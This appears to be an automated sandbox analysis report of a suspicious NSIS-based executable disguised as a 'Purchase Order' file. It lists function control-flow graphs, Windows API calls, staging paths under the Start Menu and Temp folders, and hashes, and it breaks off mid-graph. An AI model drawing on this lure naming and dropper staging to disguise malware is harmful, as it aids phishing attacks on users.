                                              control_flow_graph 261 403d58-403d6a 262 403d70-403d76 261->262 263 403eab-403eba 261->263 262->263 264 403d7c-403d85 262->264 265 403f09-403f1e 263->265 266 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 263->266 269 403d87-403d94 SetWindowPos 264->269 270 403d9a-403d9d 264->270 267 403f20-403f23 265->267 268 403f5e-403f63 call 40427d 265->268 266->265 272 403f25-403f30 call 401389 267->272 273 403f56-403f58 267->273 280 403f68-403f83 268->280 269->270 275 403db7-403dbd 270->275 276 403d9f-403db1 ShowWindow 270->276 272->273 294 403f32-403f51 SendMessageW 272->294 273->268 279 4041fe 273->279 281 403dd9-403ddc 275->281 282 403dbf-403dd4 DestroyWindow 275->282 276->275 287 404200-404207 279->287 285 403f85-403f87 call 40140b 280->285 286 403f8c-403f92 280->286 290 403dde-403dea SetWindowLongW 281->290 291 403def-403df5 281->291 288 4041db-4041e1 282->288 285->286 297 403f98-403fa3 286->297 298 4041bc-4041d5 DestroyWindow EndDialog 286->298 288->279 296 4041e3-4041e9 288->296 290->287 292 403e98-403ea6 call 404298 291->292 293 403dfb-403e0c GetDlgItem 291->293 292->287 299 403e2b-403e2e 293->299 300 403e0e-403e25 SendMessageW IsWindowEnabled 293->300 294->287 296->279 302 4041eb-4041f4 ShowWindow 296->302 297->298 303 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 297->303 298->288 304 403e30-403e31 299->304 305 403e33-403e36 299->305 300->279 300->299 302->279 331 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 303->331 332 403ff8-403ffd 303->332 308 403e61-403e66 call 40420a 304->308 309 403e44-403e49 305->309 310 403e38-403e3e 305->310 308->292 314 403e7f-403e92 SendMessageW 309->314 315 403e4b-403e51 309->315 313 403e40-403e42 310->313 310->314 313->308 314->292 319 403e53-403e59 call 40140b 315->319 320 403e68-403e71 call 40140b 315->320 329 403e5f 319->329 320->292 328 403e73-403e7d 320->328 328->329 329->308 335 404041 331->335 336 40403e-40403f 331->336 332->331 337 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404073-404084 SendMessageW 337->338 339 404086 337->339 340 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 338->340 339->340 340->280 351 4040d1-4040d3 340->351 351->280 352 4040d9-4040dd 351->352 353 4040fc-404110 DestroyWindow 352->353 354 4040df-4040e5 352->354 353->288 355 404116-404143 CreateDialogParamW 353->355 354->279 356 4040eb-4040f1 354->356 355->288 357 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 355->357 356->280 358 4040f7 356->358 357->279 363 4041a2-4041ba ShowWindow call 40427d 357->363 358->279 363->288
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                              • ShowWindow.USER32(?), ref: 00403DB1
                                              • DestroyWindow.USER32 ref: 00403DC5
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                              • GetDlgItem.USER32(?,?), ref: 00403E02
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                              • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                              • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                              • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                              • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                              • ShowWindow.USER32(00000000,?), ref: 00404007
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                              • EnableWindow.USER32(?,?), ref: 00404034
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                              • EnableMenuItem.USER32(00000000), ref: 00404051
                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404069
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                              • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                              • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                              • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                              • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                              • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D
                                              Function 004039AA Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 366 4039aa-4039c2 call 406694 369 4039c4-4039cf GetUserDefaultUILanguage call 406201 366->369 370 4039d6-403a0d call 406188 366->370 374 4039d4 369->374 376 403a25-403a2b lstrcatW 370->376 377 403a0f-403a20 call 406188 370->377 375 403a30-403a59 call 403c80 call 405c97 374->375 383 403aeb-403af3 call 405c97 375->383 384 403a5f-403a64 375->384 376->375 377->376 389 403b01-403b26 LoadImageW 383->389 390 403af5-403afc call 4062dc 383->390 384->383 385 403a6a-403a92 call 406188 384->385 385->383 395 403a94-403a98 385->395 393 403ba7-403baf call 40140b 389->393 394 403b28-403b58 RegisterClassW 389->394 390->389 408 403bb1-403bb4 393->408 409 403bb9-403bc4 call 403c80 393->409 398 403c76 394->398 399 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 394->399 396 403aaa-403ab6 lstrlenW 395->396 397 403a9a-403aa7 call 405bbc 395->397 403 403ab8-403ac6 lstrcmpiW 396->403 404 403ade-403ae6 call 405b8f call 4062ba 396->404 397->396 402 403c78-403c7f 398->402 399->393 403->404 407 403ac8-403ad2 GetFileAttributesW 403->407 404->383 411 403ad4-403ad6 407->411 412 403ad8-403ad9 call 405bdb 407->412 408->402 418 403bca-403be4 ShowWindow call 406624 409->418 419 403c4d-403c55 call 4053f5 409->419 411->404 411->412 412->404 426 403bf0-403c02 GetClassInfoW 418->426 427 403be6-403beb call 406624 418->427 424 403c57-403c5d 419->424 425 403c6f-403c71 call 40140b 419->425 424->408 432 403c63-403c6a call 40140b 424->432 425->398 430 403c04-403c14 GetClassInfoW RegisterClassW 426->430 431 403c1a-403c3d DialogBoxParamW call 40140b 426->431 427->426 430->431 435 403c42-403c4b call 4038fa 431->435 432->408 435->402
                                              APIs
                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 004039C4
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 00403A2B
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps), ref: 00403B12
                                              • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B67
                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                              • RegisterClassW.USER32(00433E80), ref: 00403C14
                                              • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 606308-1554270348
                                              • Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                              • Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
                                              • Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
                                              • Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D
                                              Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 442 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 454 402f70-402f87 452->454 456 402f89 454->456 457 402f8b-402f94 call 403331 454->457 456->457 464 402f9a-402fa1 457->464 465 4030bc-4030c4 call 402e79 457->465 462 403067-40307f call 403347 call 403331 458->462 463 403089-4030b3 GlobalAlloc call 403347 call 403116 458->463 459->444 462->459 486 403081-403087 462->486 463->459 490 4030c6-4030d7 463->490 468 402fa3-402fb7 call 405d6b 464->468 469 40301d-403021 464->469 465->459 477 40302b-403031 468->477 488 402fb9-402fc0 468->488 476 403023-40302a call 402e79 469->476 469->477 476->477 481 403040-40304a 477->481 482 403033-40303d call 406787 477->482 481->454 489 403050 481->489 482->481 486->459 486->463 488->477 492 402fc2-402fc9 488->492 489->451 493 4030d9 490->493 494 4030df-4030e4 490->494 492->477 495 402fcb-402fd2 492->495 493->494 496 4030e5-4030eb 494->496 495->477 497 402fd4-402fdb 495->497 496->496 498 4030ed-403108 SetFilePointer call 405d6b 496->498 497->477 500 402fdd-402ffd 497->500 501 40310d 498->501 500->459 502 403003-403007 500->502 501->444 503 403009-40300d 502->503 504 40300f-403017 502->504 503->489 503->504 504->477 505 403019-40301b 504->505 505->477
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,?,?,00000006,?,0000000A), ref: 00402F0A
                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F56
                                              Strings
                                              • Inst, xrefs: 00402FC2
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                              • Null, xrefs: 00402FD4
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00402EDD
                                              • Error launching installer, xrefs: 00402F2D
                                              • soft, xrefs: 00402FCB
                                              • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                              • C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-4235797136
                                              • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                              • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                              • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                              • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                              Function 004062DC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 719 4062dc-4062e7 720 4062e9-4062f8 719->720 721 4062fa-406310 719->721 720->721 722 406316-406323 721->722 723 406528-40652e 721->723 722->723 724 406329-406330 722->724 725 406534-40653f 723->725 726 406335-406342 723->726 724->723 728 406541-406545 call 4062ba 725->728 729 40654a-40654b 725->729 726->725 727 406348-406354 726->727 730 406515 727->730 731 40635a-406398 727->731 728->729 735 406523-406526 730->735 736 406517-406521 730->736 733 4064b8-4064bc 731->733 734 40639e-4063a9 731->734 739 4064be-4064c4 733->739 740 4064ef-4064f3 733->740 737 4063c2 734->737 738 4063ab-4063b0 734->738 735->723 736->723 746 4063c9-4063d0 737->746 738->737 743 4063b2-4063b5 738->743 744 4064d4-4064e0 call 4062ba 739->744 745 4064c6-4064d2 call 406201 739->745 741 406502-406513 lstrlenW 740->741 742 4064f5-4064fd call 4062dc 740->742 741->723 742->741 743->737 749 4063b7-4063ba 743->749 755 4064e5-4064eb 744->755 745->755 751 4063d2-4063d4 746->751 752 4063d5-4063d7 746->752 749->737 756 4063bc-4063c0 749->756 751->752 753 406412-406415 752->753 754 4063d9-4063f7 call 406188 752->754 760 406425-406428 753->760 761 406417-406423 GetSystemDirectoryW 753->761 762 4063fc-406400 754->762 755->741 759 4064ed 755->759 756->746 763 4064b0-4064b6 call 40654e 759->763 765 406493-406495 760->765 766 40642a-406438 GetWindowsDirectoryW 760->766 764 406497-40649b 761->764 767 4064a0-4064a3 762->767 768 406406-40640d call 4062dc 762->768 763->741 764->763 770 40649d 764->770 765->764 769 40643a-406444 765->769 766->765 767->763 773 4064a5-4064ab lstrcatW 767->773 768->764 775 406446-406449 769->775 776 40645e-406474 SHGetSpecialFolderLocation 769->776 770->767 773->763 775->776 780 40644b-406452 775->780 777 406476-40648d SHGetPathFromIDListW CoTaskMemFree 776->777 778 40648f 776->778 777->764 777->778 778->765 781 40645a-40645c 780->781 781->764 781->776
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040641D
                                              • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                              • SHGetSpecialFolderLocation.SHELL32(00405359,0041D800,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                              • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 0040647A
                                              • CoTaskMemFree.OLE32(0041D800), ref: 00406485
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                              • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-1230650788
                                              • Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                              • Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
                                              • Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
                                              • Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 846 40176f-401794 call 402c41 call 405c06 851 401796-40179c call 4062ba 846->851 852 40179e-4017b0 call 4062ba call 405b8f lstrcatW 846->852 858 4017b5-4017b6 call 40654e 851->858 852->858 861 4017bb-4017bf 858->861 862 4017c1-4017cb call 4065fd 861->862 863 4017f2-4017f5 861->863 871 4017dd-4017ef 862->871 872 4017cd-4017db CompareFileTime 862->872 865 4017f7-4017f8 call 405d8b 863->865 866 4017fd-401819 call 405db0 863->866 865->866 873 40181b-40181e 866->873 874 40188d-4018b6 call 405322 call 403116 866->874 871->863 872->871 875 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 873->875 876 40186f-401879 call 405322 873->876 888 4018b8-4018bc 874->888 889 4018be-4018ca SetFileTime 874->889 875->861 909 401864-401865 875->909 886 401882-401888 876->886 890 402ace 886->890 888->889 892 4018d0-4018db CloseHandle 888->892 889->892 893 402ad0-402ad4 890->893 895 4018e1-4018e4 892->895 896 402ac5-402ac8 892->896 898 4018e6-4018f7 call 4062dc lstrcatW 895->898 899 4018f9-4018fc call 4062dc 895->899 896->890 904 401901-4022fc call 405920 898->904 899->904 904->893 909->886 911 401867-401868 909->911 911->876
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp$C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$Call
                                              • API String ID: 1941528284-2361870633
                                              • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                              • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                              • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                              • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                              Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 912 403116-40312d 913 403136-40313f 912->913 914 40312f 912->914 915 403141 913->915 916 403148-40314d 913->916 914->913 915->916 917 40315d-40316a call 403331 916->917 918 40314f-403158 call 403347 916->918 922 403170-403174 917->922 923 40331f 917->923 918->917 924 4032ca-4032cc 922->924 925 40317a-4031c3 GetTickCount 922->925 926 403321-403322 923->926 927 40330c-40330f 924->927 928 4032ce-4032d1 924->928 929 403327 925->929 930 4031c9-4031d1 925->930 931 40332a-40332e 926->931 932 403311 927->932 933 403314-40331d call 403331 927->933 928->929 934 4032d3 928->934 929->931 935 4031d3 930->935 936 4031d6-4031e4 call 403331 930->936 932->933 933->923 944 403324 933->944 938 4032d6-4032dc 934->938 935->936 936->923 946 4031ea-4031f3 936->946 941 4032e0-4032ee call 403331 938->941 942 4032de 938->942 941->923 950 4032f0-4032fc call 405e62 941->950 942->941 944->929 947 4031f9-403219 call 4067f5 946->947 954 4032c2-4032c4 947->954 955 40321f-403232 GetTickCount 947->955 956 4032c6-4032c8 950->956 957 4032fe-403308 950->957 954->926 958 403234-40323c 955->958 959 40327d-40327f 955->959 956->926 957->938 960 40330a 957->960 961 403244-40327a MulDiv wsprintfW call 405322 958->961 962 40323e-403242 958->962 963 403281-403285 959->963 964 4032b6-4032ba 959->964 960->929 961->959 962->959 962->961 967 403287-40328e call 405e62 963->967 968 40329c-4032a7 963->968 964->930 965 4032c0 964->965 965->929 973 403293-403295 967->973 969 